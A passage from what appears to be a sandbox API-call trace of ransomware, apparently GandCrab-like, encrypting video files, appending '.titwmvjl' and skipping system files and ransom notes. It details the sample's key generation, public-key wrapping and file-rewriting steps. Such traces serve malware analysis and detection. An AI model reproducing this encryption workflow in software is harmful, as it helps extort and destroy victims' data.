(lpLibFileName="advapi32.dll") returned 0x77550000 [0095.986] CryptDestroyKey (hKey=0x5038f8) returned 1 [0095.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.986] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.987] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.987] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.987] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x962a, lpOverlapped=0x0) returned 1 [0095.998] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffff69d6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.998] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x962a, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x962a, lpOverlapped=0x0) returned 1 [0095.999] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.999] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0096.000] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.003] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.004] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.004] CloseHandle (hObject=0x2c4) returned 1 [0096.004] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\rt_f3wakpjuk49r_w.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\rt_f3WaKPJuK49r_W.flv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\rt_f3wakpjuk49r_w.flv.titwmvjl"), dwFlags=0x1) returned 1 [0096.005] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.005] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.005] lstrcmpW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2=".") returned 1 [0096.005] lstrcmpW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="..") returned 1 [0096.005] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\", lpString2="t7mOwgHt0Gu9bIDN.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi" [0096.005] lstrlenW (lpString=".titwmvjl") returned 9 [0096.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi") returned 96 [0096.005] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.005] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi.titwmvjl") returned 105 [0096.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi") returned 96 [0096.005] lstrlenW (lpString=".avi") returned 4 [0096.005] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.006] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0096.006] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0096.006] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi") returned 96 [0096.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi") returned 96 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="desktop.ini") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="autorun.inf") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="ntuser.dat") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="iconcache.db") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="bootsect.bak") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="boot.ini") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="ntuser.dat.log") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="thumbs.db") returned -1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="CRAB-DECRYPT.html") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="ntldr") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="NTDETECT.COM") returned 1 [0096.006] lstrcmpiW (lpString1="t7mOwgHt0Gu9bIDN.avi", lpString2="Bootfont.bin") returned 1 [0096.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi") returned 96 [0096.006] lstrlenW (lpString=".avi") returned 4 [0096.006] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.006] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0096.007] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.007] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.007] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\t7mowght0gu9bidn.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0096.007] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.007] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0096.008] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.008] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0096.008] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.009] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.009] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.009] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0096.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.009] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.009] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.009] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0096.009] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.010] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.010] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.010] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0096.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.010] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.010] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.010] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0096.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.011] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503478) returned 1 [0096.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.011] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0096.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.011] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0096.011] GetLastError () returned 0x0 [0096.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.012] CryptDestroyKey (hKey=0x503478) returned 1 [0096.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.012] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.012] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0096.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.012] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5033b8) returned 1 [0096.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.013] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0096.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.013] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0096.013] GetLastError () returned 0x0 [0096.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.013] CryptDestroyKey (hKey=0x5033b8) returned 1 [0096.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.013] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.013] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0096.014] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0096.014] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0xc7a4, lpOverlapped=0x0) returned 1 [0096.025] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffff385c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.025] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc7a4, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0xc7a4, lpOverlapped=0x0) returned 1 [0096.026] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.026] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0096.028] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.031] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.031] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.032] CloseHandle (hObject=0x2c4) returned 1 [0096.032] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\t7mowght0gu9bidn.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\t7mOwgHt0Gu9bIDN.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\t7mowght0gu9bidn.avi.titwmvjl"), dwFlags=0x1) returned 1 [0096.033] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.033] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.033] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.033] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.033] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\TITWMVJL-DECRYPT.txt" [0096.033] lstrlenW (lpString=".titwmvjl") returned 9 [0096.033] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\TITWMVJL-DECRYPT.txt") returned 96 [0096.033] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.033] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 105 [0096.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\TITWMVJL-DECRYPT.txt") returned 96 [0096.034] lstrlenW (lpString=".txt") returned 4 [0096.034] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.034] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.034] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.034] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\TITWMVJL-DECRYPT.txt") returned 96 [0096.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\TITWMVJL-DECRYPT.txt") returned 96 [0096.034] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.034] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.034] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.034] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.034] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.034] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.034] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.034] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.034] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.034] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.034] lstrcmpW (lpString1="Z6WO.mkv", lpString2=".") returned 1 [0096.034] lstrcmpW (lpString1="Z6WO.mkv", lpString2="..") returned 1 [0096.034] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\", lpString2="Z6WO.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv" [0096.034] lstrlenW (lpString=".titwmvjl") returned 9 [0096.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv") returned 84 [0096.034] VirtualAlloc (lpAddress=0x0, dwSize=0xe8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.035] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv.titwmvjl") returned 93 [0096.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv") returned 84 [0096.035] lstrlenW (lpString=".mkv") returned 4 [0096.035] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.035] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0096.035] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0096.035] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv") returned 84 [0096.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv") returned 84 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="desktop.ini") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="autorun.inf") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="ntuser.dat") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="iconcache.db") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="bootsect.bak") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="boot.ini") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="ntuser.dat.log") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="thumbs.db") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="KRAB-DECRYPT.html") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="CRAB-DECRYPT.html") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="KRAB-DECRYPT.txt") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="ntldr") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="NTDETECT.COM") returned 1 [0096.035] lstrcmpiW (lpString1="Z6WO.mkv", lpString2="Bootfont.bin") returned 1 [0096.036] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv") returned 84 [0096.036] lstrlenW (lpString=".mkv") returned 4 [0096.036] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.036] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mkv ") returned 5 [0096.036] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.036] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.036] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\Z6WO.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\z6wo.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0096.036] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.036] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0096.037] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.037] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.037] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0096.038] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.038] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.038] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.038] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0096.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.038] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.038] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.038] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0096.039] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.039] GetModuleHandleA 